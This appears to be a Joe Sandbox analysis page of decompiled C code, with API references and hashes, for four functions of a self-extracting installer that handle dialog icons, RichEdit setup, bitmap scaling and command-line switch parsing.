
Function 00408F3F, Relevance: 36.3, APIs: 24, Instructions: 265
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00408F3F(void* __edx) {
				struct HWND__* _v4;
				struct HWND__* _v8;
				void* __ecx;
				signed int _t45;
				signed int _t51;
				long _t53;
				signed int _t67;
				void* _t71;
				void* _t75;
				long _t91;
				int _t95;
				int _t96;
				struct HWND__* _t102;
				struct HWND__* _t103;
				struct HWND__* _t104;
				long _t107;
				intOrPtr* _t108;
				void* _t111;
				void* _t113;
				void* _t126;
				void* _t129;
				void* _t133;
				void* _t135;
				intOrPtr* _t140;
				void* _t143;
				long _t147;

				_t135 = __edx;
				_t140 = _t108;
				 *0x41e784 = 0;
				if(( *0x41e44c & 0x00000200) == 0) {
					_v8 = LoadIconW(GetModuleHandleW(0), 0x65);
					_t95 = GetSystemMetrics(0x32);
					_t96 = GetSystemMetrics(0x31);
					_t107 = LoadImageW(GetModuleHandleW(0), 0x65, 1, _t96, _t95, 0);
					if(_t107 == 0) {
						_t107 = _v8;
					}
					SendMessageW( *(_t140 + 4), 0x80, 1, _v8);
					SendMessageW( *(_t140 + 4), 0x80, 0, _t107);
				}
				if(( *0x41e44c & 0x00004000) != 0) {
					_v8 = GetDlgItem( *(_t140 + 4), 0x4b2);
					_v4 = GetDlgItem( *(_t140 + 4), 0x4b2);
					SetWindowLongW(_v4, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) | 0x00000080);
					_v4 = GetDlgItem( *(_t140 + 4), 0x4b5);
					_v8 = GetDlgItem( *(_t140 + 4), 0x4b5);
					_t91 = GetWindowLongW(_v4, 0xfffffff0) | 0x00000080;
					_t147 = _t91;
					SetWindowLongW(_v8, 0xfffffff0, _t91);
				}
				E00407A0F(GetDlgItem( *(_t140 + 4), 0x4b2),  *((intOrPtr*)(_t140 + 0x10)));
				E00408056(_t140, _t147,  *((intOrPtr*)(_t140 + 0xc)));
				_t45 =  *(_t140 + 8) & 0x00000003;
				if(_t45 == 0) {
					_t111 = 0x1b;
					E00408618(_t140, 0x4b3, E00403DC8(_t111));
					_push(0x1c);
					goto L14;
				} else {
					_t71 = _t45 - 1;
					if(_t71 == 0) {
						_t126 = 0x19;
						E00408618(_t140, 0x4b3, E00403DC8(_t126));
						E00407ABB(_t140, 0x4b4, 0);
						L15:
						if( *((intOrPtr*)(_t140 + 0x38)) == 0) {
							_t51 =  *(_t140 + 8) & 0x0000001c;
							__eflags = _t51 - 4;
							if(_t51 == 4) {
								_push(0x65);
								_push(GetModuleHandleW(0));
								L39:
								_t53 = LoadIconW();
								__eflags = _t53;
								if(_t53 == 0) {
									L41:
									 *((intOrPtr*)(_t140 + 0x30)) = 0;
									E00407ABB(_t140, 0x4b1, 0);
									L42:
									__eflags =  *0x41e44c & 0x00000008;
									if(( *0x41e44c & 0x00000008) == 0) {
										E00407F31(_t140);
									}
									 *((intOrPtr*)( *_t140 + 0x28))();
									 *((intOrPtr*)( *_t140 + 0x24))();
									L45:
									E004079B1(_t140, _t135);
									return 0;
								}
								 *((intOrPtr*)(_t140 + 0x30)) = 1;
								SendMessageW(GetDlgItem( *(_t140 + 4), 0x4b1), 0x172, 1, _t53);
								goto L42;
							}
							__eflags = _t51 - 8;
							if(_t51 == 8) {
								_push(0x7f02);
								L34:
								_push(0);
								goto L39;
							}
							__eflags = _t51 - 0xc;
							if(_t51 == 0xc) {
								_push(0x7f01);
								goto L34;
							}
							__eflags = _t51 - 0x10;
							if(_t51 == 0x10) {
								_push(0x7f04);
								goto L34;
							}
							__eflags = _t51 - 0x14;
							if(_t51 != 0x14) {
								goto L41;
							}
							_push(0x7f03);
							goto L34;
						}
						_t143 = 5;
						_push(_t143);
						_push( *(_t140 + 4));
						while(1) {
							_t102 = GetWindow();
							if(_t102 == 0) {
								goto L19;
							}
							E00404C1B(_t102);
							_push(2);
							_push(_t102);
						}
						while(1) {
							L19:
							_push(_t143);
							_push( *(_t140 + 4));
							while(1) {
								_t103 = GetWindow();
								if(_t103 == 0) {
									break;
								}
								_t67 = E00404C8C(_t103);
								__eflags = _t67;
								if(_t67 != 0) {
									goto L19;
								}
								_push(2);
								_push(_t103);
							}
							_push(_t143);
							_push( *(_t140 + 4));
							while(1) {
								_t104 = GetWindow();
								if(_t104 == 0) {
									break;
								}
								E00403C19(_t104);
								_push(2);
								_push(_t104);
							}
							if(( *0x41e44c & 0x00000008) == 0) {
								E00407F31(_t140);
							}
							goto L45;
						}
					}
					_t75 = _t71 - 1;
					if(_t75 == 0) {
						_t129 = 0x1a;
						E00408618(_t140, 0x4b4, E00403DC8(_t129));
						E00407ABB(_t140, 0x4b3, 0);
						E00407894(_t140, 0x4b4);
						goto L15;
					}
					if(_t75 != 1) {
						goto L15;
					}
					_t133 = 0x19;
					E00408618(_t140, 0x4b3, E00403DC8(_t133));
					_push(0x1a);
					L14:
					_pop(_t113);
					E00408618(_t140, 0x4b4, E00403DC8(_t113));
					goto L15;
				}
			}

0x00408f3f
0x00408f4f
0x00408f51
0x00408f5d
0x00408f7c
0x00408f80
0x00408f85
0x00408f97
0x00408f9b
0x00408f9d
0x00408f9d
0x00408fb1
0x00408fba
0x00408fba
0x00408fd1
0x00408fdd
0x00408fe9
0x00408ffc
0x00409014
0x00409020
0x0040902a
0x0040902a
0x00409033
0x00409033
0x00409045
0x0040904f
0x0040905c
0x0040905e
0x004090d9
0x004090e7
0x004090ec
0x00000000
0x00409060
0x00409060
0x00409061
0x004090b5
0x004090c3
0x004090d0
0x00409101
0x00409104
0x00409177
0x0040917a
0x0040917d
0x004091b0
0x004091b9
0x004091ba
0x004091ba
0x004091c0
0x004091c2
0x004091e4
0x004091ec
0x004091ef
0x004091f4
0x004091f4
0x004091fb
0x004091ff
0x004091ff
0x00409208
0x0040920f
0x00409212
0x00409214
0x00409221
0x00409221
0x004091d6
0x004091dc
0x00000000
0x004091dc
0x0040917f
0x00409182
0x004091a9
0x00409198
0x00409198
0x00000000
0x00409198
0x00409184
0x00409187
0x004091a2
0x00000000
0x004091a2
0x00409189
0x0040918c
0x0040919b
0x00000000
0x0040919b
0x0040918e
0x00409191
0x00000000
0x00000000
0x00409193
0x00000000
0x00409193
0x0040910e
0x0040910f
0x00409110
0x0040911f
0x00409121
0x00409125
0x00000000
0x00000000
0x00409117
0x0040911c
0x0040911e
0x0040911e
0x00409127
0x00409127
0x00409127
0x00409128
0x0040913b
0x0040913d
0x00409141
0x00000000
0x00000000
0x0040912f
0x00409134
0x00409136
0x00000000
0x00000000
0x00409138
0x0040913a
0x0040913a
0x00409143
0x00409144
0x00409153
0x00409155
0x00409159
0x00000000
0x00000000
0x0040914b
0x00409150
0x00409152
0x00409152
0x00409162
0x0040916a
0x0040916a
0x00000000
0x00409162
0x00409127
0x00409063
0x00409064
0x00409088
0x00409097
0x004090a4
0x004090ac
0x00000000
0x004090ac
0x00409067
0x00000000
0x00000000
0x0040906f
0x0040907d
0x00409082
0x004090ee
0x004090ee
0x004090fc
0x00000000
0x004090fc

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
LoadIconW.USER32(00000000), ref: 00408F6C
GetSystemMetrics.USER32 ref: 00408F80
GetSystemMetrics.USER32 ref: 00408F85
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
LoadImageW.USER32 ref: 00408F91
SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA

Part of subcall function 00408618: GetDlgItem.USER32 ref: 00408629
Part of subcall function 00408618: GetWindowTextLengthW.USER32(00000000), ref: 0040862C
Part of subcall function 00408618: GetDlgItem.USER32 ref: 00408641

Part of subcall function 00407ABB: GetDlgItem.USER32 ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

GetDlgItem.USER32 ref: 00408FD7
GetDlgItem.USER32 ref: 00408FE1
GetWindowLongW.USER32(?,000000F0), ref: 00408FED
SetWindowLongW.USER32 ref: 00408FFC
GetDlgItem.USER32 ref: 0040900A
GetDlgItem.USER32 ref: 00409018
GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
SetWindowLongW.USER32 ref: 00409033
GetDlgItem.USER32 ref: 00409040
GetWindow.USER32(?,00000005), ref: 0040911F
GetWindow.USER32(?,00000005), ref: 0040913B
GetWindow.USER32(?,00000005), ref: 00409153
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,00000000,?,?,?,?,?,0040932F), ref: 004091B3
LoadIconW.USER32(00000000), ref: 004091BA
GetDlgItem.USER32 ref: 004091D9
SendMessageW.USER32(00000000), ref: 004091DC

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ItemWindow$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 4137352925-0
Opcode ID: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
Instruction ID: 55e12659e9cef202b758582d1d7e0fb50da9d044521ae722c1703057fdaec8c6
Opcode Fuzzy Hash: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
Instruction Fuzzy Hash: DD71D5703447067BEA256B218D4AF2F3A99DB84704F10483EF652BA2D3CB7DDC019A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00404C8C, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 115
windowlibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404C8C(struct HWND__* __ecx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v28;
				long _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				int _v52;
				int _v56;
				char _v120;
				signed char _t30;
				struct HWND__* _t33;
				struct HMENU__* _t36;
				struct HWND__* _t53;
				struct HWND__* _t67;

				_t67 = __ecx;
				if(GetClassNameA(__ecx,  &_v120, 0x40) == 0 || lstrcmpiA( &_v120, "STATIC") != 0) {
					L5:
					return 0;
				} else {
					_t30 = GetWindowLongW(_t67, 0xfffffff0);
					_t71 = _t30 & 0x0000000e;
					if((_t30 & 0x0000000e) != 0) {
						goto L5;
					}
					E00404BDD( &_v28, _t67, _t71);
					if(E0040386E(_v28, L"{\\rtf", 5) == 0) {
						_t33 = GetParent(_t67);
						_v8 = _t33;
						__eflags = _t33;
						if(_t33 == 0) {
							goto L4;
						}
						LoadLibraryA("riched20");
						E004039BC(_t67,  &_v56);
						_t36 = GetMenu(_t67);
						SetThreadLocale(0x419);
						_t53 = CreateWindowExW(0, L"RichEdit20W", 0x41aa3c, 0x50000804, _v56, _v52, _v48 - _v56, _v44 - _v52, _v8, _t36, 0, 0);
						__eflags = _t53;
						if(__eflags == 0) {
							goto L4;
						}
						DestroyWindow(_t67);
						SendMessageW(_t53, 0x459, 0x22, 0);
						SendMessageW(_t53, 0x443, 0, GetSysColor(0xf));
						_v12 = 0xfde9;
						_v16 = 0;
						E00404473( &_v40,  &_v28, __eflags, 0xfde9);
						SendMessageW(_t53, 0x461,  &_v16, _v40);
						_push(_v40);
						L004191B0();
						_push(_v28);
						L004191B0();
						return _t53;
					}
					L4:
					_push(_v28);
					L004191B0();
					goto L5;
				}
			}

0x00404c9a
0x00404ca6
0x00404cee
0x00000000
0x00404cbb
0x00404cbe
0x00404cc4
0x00404cc6
0x00000000
0x00000000
0x00404ccd
0x00404ce3
0x00404cf6
0x00404cfe
0x00404d01
0x00404d03
0x00000000
0x00000000
0x00404d0a
0x00404d15
0x00404d1b
0x00404d28
0x00404d5e
0x00404d60
0x00404d62
0x00000000
0x00000000
0x00404d65
0x00404d7a
0x00404d8c
0x00404d9a
0x00404d9d
0x00404da0
0x00404db2
0x00404db4
0x00404db7
0x00404dbc
0x00404dbf
0x00000000
0x00404dc6
0x00404ce5
0x00404ce5
0x00404ce8
0x00000000
0x00404ced

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00404C9E
lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00404CB1
GetWindowLongW.USER32(?,000000F0), ref: 00404CBE

Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
Part of subcall function 00404BDD: GetWindowTextW.USER32 ref: 00404C04

??3@YAXPAX@Z.MSVCRT ref: 00404CE8
GetParent.USER32 ref: 00404CF6
LoadLibraryA.KERNEL32(riched20,?,00000005,?,000000F0,?,?,00000040), ref: 00404D0A
GetMenu.USER32 ref: 00404D1B
SetThreadLocale.KERNEL32(00000419,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D28
CreateWindowExW.USER32 ref: 00404D58
DestroyWindow.USER32(?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D65
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00404D7A
GetSysColor.USER32(0000000F), ref: 00404D7E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00404D8C
SendMessageW.USER32(00000000,00000461,?,?), ref: 00404DB2
??3@YAXPAX@Z.MSVCRT ref: 00404DB7
??3@YAXPAX@Z.MSVCRT ref: 00404DBF

Strings

riched20, xrefs: 00404D05
{\rtf, xrefs: 00404CD7
RichEdit20W, xrefs: 00404D52
STATIC, xrefs: 00404CA8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
Instruction ID: 47a03a17b0e693a7b9506e1f1950c79874d349430206e003879b4e45598c68c3
Opcode Fuzzy Hash: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
Instruction Fuzzy Hash: 4131C271A02119BFDB01ABA1DD49EEF7B7DEF44704F10402AF601B2291DB794E508B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403AD9, Relevance: 31.6, APIs: 21, Instructions: 119
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00403AD9(void* __ecx) {
				struct HDC__* _v8;
				struct HDC__* _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				int _v44;
				int _v48;
				void _v52;
				struct HDC__* _t37;
				int _t38;
				int _t39;
				int _t62;
				struct HDC__* _t63;

				_v16 = __ecx;
				_t37 = GetWindowDC(0);
				_v8 = _t37;
				_t38 = GetDeviceCaps(_t37, 0x58);
				if(_t38 < 1) {
					_t38 = 0x60;
				}
				_t39 = MulDiv(_t38, 0x64, 0x60);
				if(_t39 < 0x76) {
					if(_t39 <= 0x91) {
						ReleaseDC(0, _v8);
						return CopyImage(_v16, 0, 0, 0, 0);
					}
					goto L6;
				} else {
					if(_t39 > 0x91) {
						L6:
						_push(3);
						_v12 = 2;
						L7:
						_pop(_t62);
						GetObjectW(_v16, 0x18,  &_v52);
						_v24 = MulDiv(_v48, _t62, _v12);
						_v20 = MulDiv(_v44, _t62, _v12);
						_v12 = CreateCompatibleDC(_v8);
						_t63 = CreateCompatibleDC(_v8);
						_v16 = SelectObject(_v12, _v16);
						_v28 = SelectObject(_t63, CreateCompatibleBitmap(_v8, _v24, _v20));
						SetStretchBltMode(_t63, 4);
						StretchBlt(_t63, 0, 0, _v24, _v20, _v12, 0, 0, _v48, _v44, 0xcc0020);
						_v24 = GetCurrentObject(_t63, 7);
						SelectObject(_v12, _v16);
						SelectObject(_t63, _v28);
						DeleteDC(_v12);
						DeleteDC(_t63);
						ReleaseDC(0, _v8);
						return _v24;
					}
					_push(4);
					_v12 = 3;
					goto L7;
				}
			}

0x00403ae5
0x00403ae8
0x00403af1
0x00403af4
0x00403afd
0x00403b01
0x00403b01
0x00403b0d
0x00403b12
0x00403b2b
0x00403c01
0x00000000
0x00403c0e
0x00000000
0x00403b14
0x00403b19
0x00403b31
0x00403b31
0x00403b33
0x00403b3a
0x00403b3a
0x00403b44
0x00403b56
0x00403b68
0x00403b70
0x00403b81
0x00403b88
0x00403b9e
0x00403ba1
0x00403bc0
0x00403bd2
0x00403bd8
0x00403bde
0x00403be9
0x00403bec
0x00403bf2
0x00000000
0x00403bf8
0x00403b1b
0x00403b1d
0x00000000
0x00403b1d

APIs

GetWindowDC.USER32(00000000), ref: 00403AE8
GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
GetObjectW.GDI32(?,00000018,?), ref: 00403B44
MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
CreateCompatibleDC.GDI32(?), ref: 00403B6B
CreateCompatibleDC.GDI32(?), ref: 00403B73
SelectObject.GDI32(00000002,?), ref: 00403B83
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
SelectObject.GDI32(00000000,00000000), ref: 00403B99
SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
SelectObject.GDI32(00000002,?), ref: 00403BD8
SelectObject.GDI32(00000000,?), ref: 00403BDE
DeleteDC.GDI32(00000002), ref: 00403BE9
DeleteDC.GDI32(00000000), ref: 00403BEC
ReleaseDC.USER32 ref: 00403BF2
ReleaseDC.USER32 ref: 00403C01
CopyImage.USER32 ref: 00403C0E

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
Instruction ID: a0072e5f292db19c94c8224914de7ba953a02d223df6358cf2059d22beae88df
Opcode Fuzzy Hash: 82980da23295317485c8058d9f32326a8285abc7e5f11a3e30116cecc0f103df
Instruction Fuzzy Hash: AE410675C01218BFDF129FE1DC49EEEBF79EB08365F108066F600B2161C7764A60AB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401765, Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 273
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401765(void* __eflags) {
				signed short* _v8;
				WCHAR* _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				void* _t65;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				WCHAR* _t92;
				WCHAR* _t95;
				WCHAR* _t96;
				WCHAR* _t97;
				signed int _t99;
				WCHAR* _t103;
				signed short* _t105;
				signed int _t106;
				signed int _t107;
				signed short* _t108;
				signed int _t143;
				signed int _t150;
				char _t151;
				WCHAR* _t164;
				WCHAR* _t167;

				_t167 =  *0x41e7cc; // 0xbc2510
				E00411B60(_t65,  &_v24);
				_v8 = _t167;
				_v12 =  &(_t167[lstrlenW(_t167)]);
				_t69 =  *_t167 & 0x0000ffff;
				while(_t69 != 0) {
					__eflags = _t69 - 0x20;
					if(_t69 <= 0x20) {
						_t6 =  &_v8;
						 *_t6 =  &(_v8[1]);
						__eflags =  *_t6;
						_t69 =  *_v8 & 0x0000ffff;
						continue;
					}
					L6:
					while( *_t167 <= 0x20) {
						while(1) {
							_t70 =  *_t167 & 0x0000ffff;
							if(_t70 == 0) {
								break;
							}
							__eflags = _t70 - 0x20;
							if(_t70 <= 0x20) {
								_t167 =  &(_t167[1]);
								__eflags = _t167;
								continue;
							}
							break;
						}
						_t71 =  *_t167 & 0x0000ffff;
						if(_t71 == 0x2f || _t71 == 0x2d) {
							if(_t167[1] == 0x21) {
								_t164 = _t167;
								_t167 =  &(_t167[2]);
								__eflags = _t164;
								if(_t164 == 0) {
									goto L67;
								}
								goto L68;
							} else {
								_t10 =  &(_t167[1]); // 0xbc2510
								if(E004030D4(_t10, L"ai") == 0) {
									_t12 =  &(_t167[1]); // 0xbc2510
									__eflags = E004030D4(_t12, L"om");
									if(__eflags == 0) {
										_t14 =  &(_t167[1]); // 0xbc2510
										_t92 = E004030D4(_t14, L"gm");
										__eflags = _t92;
										if(_t92 == 0) {
											_t17 =  &(_t167[1]); // 0xbc2510
											__eflags = E004030D4(_t17, L"gf");
											if(__eflags == 0) {
												_t19 =  &(_t167[1]); // 0xbc2510
												__eflags = E004030D4(_t19, L"mf");
												if(__eflags == 0) {
													_t21 =  &(_t167[1]); // 0xbc2510
													_t95 = E004030D4(_t21, L"sd");
													__eflags = _t95;
													if(_t95 == 0) {
														_t24 =  &(_t167[1]); // 0xbc2510
														_t96 = E004030D4(_t24, L"nr");
														__eflags = _t96;
														if(_t96 == 0) {
															_t26 =  &(_t167[1]); // 0xbc2510
															_t97 = E004030D4(_t26, L"fm");
															__eflags = _t97;
															if(_t97 == 0) {
																_t28 =  &(_t167[1]); // 0xbc2510
																__eflags = E004030D4(_t28, L"bpt");
																if(__eflags == 0) {
																	_t99 = _t167[1] & 0x0000ffff;
																	__eflags = _t99 - 0x70;
																	if(_t99 == 0x70) {
																		L65:
																		E00411B60(_t99,  &_v36);
																		_t35 =  &(_t167[2]); // 0xbc2512
																		_t38 = E0040310A(_t35,  &_v36) - 2; // -2
																		_t167 = _t38;
																		E00411BE5(0x41e708, _v36);
																		_push(_v36);
																		 *0x41e700 = 1;
																		L004191B0();
																		continue;
																	} else {
																		__eflags = _t99 - 0x50;
																		if(_t99 == 0x50) {
																			goto L65;
																		} else {
																			__eflags = _t99 - 0x79;
																			if(_t99 == 0x79) {
																				L55:
																				__eflags = _t167[2] - 0x20;
																				if(_t167[2] > 0x20) {
																					goto L57;
																				} else {
																					 *0x41e7c9 = 1;
																					continue;
																				}
																			} else {
																				__eflags = _t99 - 0x59;
																				if(_t99 != 0x59) {
																					L57:
																					__eflags = _t99 - 0x3f;
																					if(_t99 == 0x3f) {
																						L60:
																						__eflags = _t167[2] - 0x20;
																						if(_t167[2] > 0x20) {
																							goto L62;
																						} else {
																							 *0x41e7cb = 1;
																							continue;
																						}
																					} else {
																						__eflags = _t99 - 0x68;
																						if(_t99 == 0x68) {
																							goto L60;
																						} else {
																							__eflags = _t99 - 0x48;
																							if(_t99 != 0x48) {
																								L62:
																								_t33 =  &(_t167[1]); // 0xbc2510
																								_t103 = E0040161A(_t33);
																								__eflags = _t103;
																								if(_t103 == 0) {
																									goto L67;
																								} else {
																									__eflags = _t103 - 1;
																									if(_t103 == 1) {
																										_t167 = 0;
																										__eflags = 0;
																									} else {
																										_t167 = _t103;
																										continue;
																									}
																								}
																							} else {
																								goto L60;
																							}
																						}
																					}
																				} else {
																					goto L55;
																				}
																			}
																		}
																	}
																} else {
																	_t29 =  &(_t167[4]); // 0xbc2516
																	_t163 = _t29;
																	goto L50;
																}
															} else {
																_t27 =  &(_t167[3]); // 0xbc2514
																_t105 = _t27;
																_t143 =  *_t105 & 0x0000ffff;
																__eflags = _t143 - 0x30;
																if(_t143 < 0x30) {
																	goto L67;
																} else {
																	__eflags = _t143 - 0x39;
																	if(_t143 > 0x39) {
																		goto L67;
																	} else {
																		__imp___wtol(_t105);
																		 *0x41e458 = _t105;
																		continue;
																	}
																}
															}
														} else {
															__eflags = _t167[3] - 0x20;
															if(_t167[3] > 0x20) {
																goto L67;
															} else {
																 *0x41e7ca = 1;
																continue;
															}
														}
													} else {
														_t22 =  &(_t167[3]); // 0xbc2514
														_t163 = _t22;
														_t106 =  *_t22 & 0x0000ffff;
														__eflags = _t106 - 0x30;
														if(_t106 == 0x30) {
															L39:
															__eflags = _t167[4] - 0x20;
															if(__eflags > 0) {
																goto L67;
															} else {
																goto L50;
															}
														} else {
															__eflags = _t106 - 0x31;
															if(_t106 != 0x31) {
																goto L67;
															} else {
																goto L39;
															}
														}
													}
												} else {
													_t20 =  &(_t167[3]); // 0xbc2514
													_t163 = _t20;
													goto L50;
												}
											} else {
												_t18 =  &(_t167[3]); // 0xbc2514
												_t163 = _t18;
												goto L50;
											}
										} else {
											_t15 =  &(_t167[3]); // 0xbc2514
											_t163 = _t15;
											_t107 =  *_t15 & 0x0000ffff;
											__eflags = _t107 - 0x30;
											if(_t107 < 0x30) {
												goto L67;
											} else {
												__eflags = _t107 - 0x32;
												if(_t107 > 0x32) {
													goto L67;
												} else {
													__eflags = _t167[4] - 0x20;
													if(__eflags > 0) {
														goto L67;
													} else {
														goto L50;
													}
												}
											}
										}
									} else {
										_t13 =  &(_t167[3]); // 0xbc2514
										_t163 = _t13;
										L50:
										E0040170F(_t163, __eflags);
										continue;
									}
								} else {
									_t11 =  &(_t167[3]); // 0xbc2514
									_t108 = _t11;
									_t150 =  *_t108 & 0x0000ffff;
									if(_t150 < 0x30 || _t150 > 0x39) {
										if(_t150 < 0x61 || _t150 > 0x7a) {
											if(_t150 < 0x41 || _t150 > 0x5a) {
												__eflags = _t150 - 0x20;
												if(_t150 > 0x20) {
													goto L67;
												} else {
													 *0x41e7c4 = 0x41a648;
													goto L22;
												}
											} else {
												goto L21;
											}
										} else {
											goto L21;
										}
									} else {
										L21:
										 *0x41e7c4 = _t108;
										L22:
										 *0x41e7c8 = 0x101;
										continue;
									}
								}
							}
						} else {
							L67:
							_t164 = _t167;
							L68:
							__eflags = _v8 - _t164;
							if(__eflags == 0) {
								_t151 = 0x41aa3c;
							} else {
								E00411B84( &_v60, _v8);
								E00411A27( &_v48, _t164 - _v8 >> 1,  &_v60);
								E00411BE5( &_v24, _v48);
								_push(_v48);
								L004191B0();
								_push(_v60);
								L004191B0();
								E00411E5D( &_v24);
								E00411E26( &_v24);
								_t151 = _v24;
							}
							E00405051(L"SfxVarCmdLine1", _t151, __eflags, 1);
							E00411B84( &_v48, _t167);
							E00411A27( &_v60, _v12 - _t167 >> 1,  &_v48);
							E00411BE5( &_v24, _v60);
							_push(_v60);
							L004191B0();
							_push(_v48);
							L004191B0();
							E00411E5D( &_v24);
							E00411E26( &_v24);
							E00405051(L"SfxVarCmdLine2", _v24, __eflags, 1);
						}
						_push(_v24);
						L004191B0();
						return _t167;
					}
					_t167 =  &(_t167[1]);
					__eflags = _t167;
					goto L6;
				}
				goto L6;
			}

0x0040176c
0x00401776
0x0040177c
0x00401788
0x0040178b
0x004017a0
0x00401790
0x00401794
0x00401796
0x00401796
0x00401796
0x0040179d
0x00000000
0x0040179d
0x00000000
0x004017aa
0x004017bb
0x004017bb
0x004017c1
0x00000000
0x00000000
0x004017b2
0x004017b6
0x004017b8
0x004017b8
0x00000000
0x004017b8
0x00000000
0x004017b6
0x004017c3
0x004017c9
0x004017d9
0x00401a2f
0x00401a31
0x00401a34
0x00401a36
0x00000000
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017ee
0x0040183e
0x00401846
0x00401848
0x0040185c
0x0040185f
0x00401864
0x00401866
0x0040189a
0x004018a2
0x004018a4
0x004018b8
0x004018c0
0x004018c2
0x004018d6
0x004018d9
0x004018de
0x004018e0
0x0040190d
0x00401910
0x00401915
0x00401917
0x00401935
0x00401938
0x0040193d
0x0040193f
0x00401970
0x00401978
0x0040197a
0x0040198e
0x00401992
0x00401995
0x004019f7
0x004019fa
0x004019ff
0x00401a12
0x00401a12
0x00401a15
0x00401a1a
0x00401a1d
0x00401a24
0x00000000
0x00401997
0x00401997
0x0040199a
0x00000000
0x0040199c
0x0040199c
0x0040199f
0x004019a6
0x004019a6
0x004019ab
0x00000000
0x004019ad
0x004019ad
0x00000000
0x004019ad
0x004019a1
0x004019a1
0x004019a4
0x004019b9
0x004019b9
0x004019bc
0x004019c8
0x004019c8
0x004019cd
0x00000000
0x004019cf
0x004019cf
0x00000000
0x004019cf
0x004019be
0x004019be
0x004019c1
0x00000000
0x004019c3
0x004019c3
0x004019c6
0x004019db
0x004019db
0x004019de
0x004019e3
0x004019e5
0x00000000
0x004019e7
0x004019e7
0x004019ea
0x00401a8e
0x00401a8e
0x004019f0
0x004019f0
0x00000000
0x004019f0
0x004019ea
0x00000000
0x00000000
0x00000000
0x004019c6
0x004019c1
0x00000000
0x00000000
0x00000000
0x004019a4
0x0040199f
0x0040199a
0x0040197c
0x0040197c
0x0040197c
